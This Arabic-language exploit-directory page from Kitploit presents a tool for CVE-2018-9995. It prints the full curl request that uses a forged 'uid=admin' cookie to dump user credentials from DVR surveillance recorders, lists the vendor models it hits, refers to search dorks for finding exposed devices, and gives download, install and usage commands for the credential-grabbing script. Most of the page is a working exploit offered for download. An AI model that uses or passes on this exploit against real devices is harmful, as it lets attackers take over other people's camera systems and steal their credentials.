Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2018-9995_dvr_credentials-dev_tool — أداة استغلال لـ CVE-2018-9995 تستخرج بيانات الاعتماد من أجهزة DVR المكشوفة عبر طلب HTTP مع تجاوز ملفات تعريف الارتباط، وتستهدف نماذج متعددة من البائعين. | Kitploit
أدوات/GitHubGitHub/likaifeng0/cve-2018-9995_dvr_credentials-dev_tool
أمان إنترنت الأشياءهجمات كلمات المرورتحليل الثغرات الأمنيةالاستغلالجمع المعلوماتأمن الويب
GitHublikaifeng0/cve-2018-9995_dvr_credentials-dev_tool

CVE-2018-9995_dvr_credentials-dev_tool

أداة استغلال لـ CVE-2018-9995 تستخرج بيانات الاعتماد من أجهزة DVR المكشوفة عبر طلب HTTP مع تجاوز ملفات تعريف الارتباط، وتستهدف نماذج متعددة من البائعين.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
110منذ 7 سنواتلم تتم المراجعة بعد

[أداة] عرض بيانات اعتماد DVR

[*] عنوان الاستغلال:       "يحصل على بيانات اعتماد DVR" 
[*] CVE:                 CVE-2018-9995
[*] درجة الأساس CVSS v3:  7.3 / 10
[*] سلسلة متجه CVSS:      CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N  
[*] التاريخ:                09/04/2018
[*] مؤلف الاستغلال:      Fernandez Ezequiel ( twitter:@capitan_alfa )

DVR_wall

الاستغلال:

	$> curl "http://<dvr_host>:<port>/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"

تم اختباره على DVR (اللافتة/البائع؟):

Novo
CeNova
QSee
Pulnix
XVR 5 in 1 (العنوان: "XVR Login")
Securus,  - الأمان. لا مساومة أبداً !! - 
Night OWL
DVR Login
HVR Login
MDVR Login

في البرية:

DVR_dorks_0 DVR_dorks_2 DVR_dorks_1 DVR_dorks_3

اللافتات المحتملة للواجهة الأمامية (الويب):

DVR_login_1 DVR_login_2 DVR_login_3 DVR_login_4 DVR_login_5 DVR_login_6 DVR_login_7 DVR_login_8 DVR_login_10

داخلي:

DVR_indoor_1 DVR_indoor_2 DVR_indoor_3 DVR_indoor_4 DVR_indoor_5 DVR_indoor_6 DVR_indoor_7

الأداة: "عرض جميع بيانات اعتماد DVR"

بدء سريع

usr@pwn:~$ git clone https://github.com/ezelf/CVE-2018-9995_dvr_credentials.git
usr@pwn:~$ cd CVE-2018-9995_dvr_credentials
usr@pwn:~$ pip install -r requirements.txt

المساعدة

usage: getDVR_Credentials.py [-h] [-v] --host HOST [--port PORT]

[+] Obtaining Exposed credentials

optional arguments:
  -h, --help     show this help message and exit
  -v, --version  show program's version number and exit
  --host HOST    Host
  --port PORT    Port

[+] Demo: python getDVR_Credentials.py --host 192.168.1.101 -p 81

إثباتات المفاهيم (المخرجات):

DVR_poc_4 DVR_poc_3 DVR_poc_2 DVR_poc_1

المدونة:

http://misteralfa-hack.blogspot.cl/2018/04/update-dvr-login-bypass-cve-2018-9995.html

أراك... ! xd

تنزيل الأداة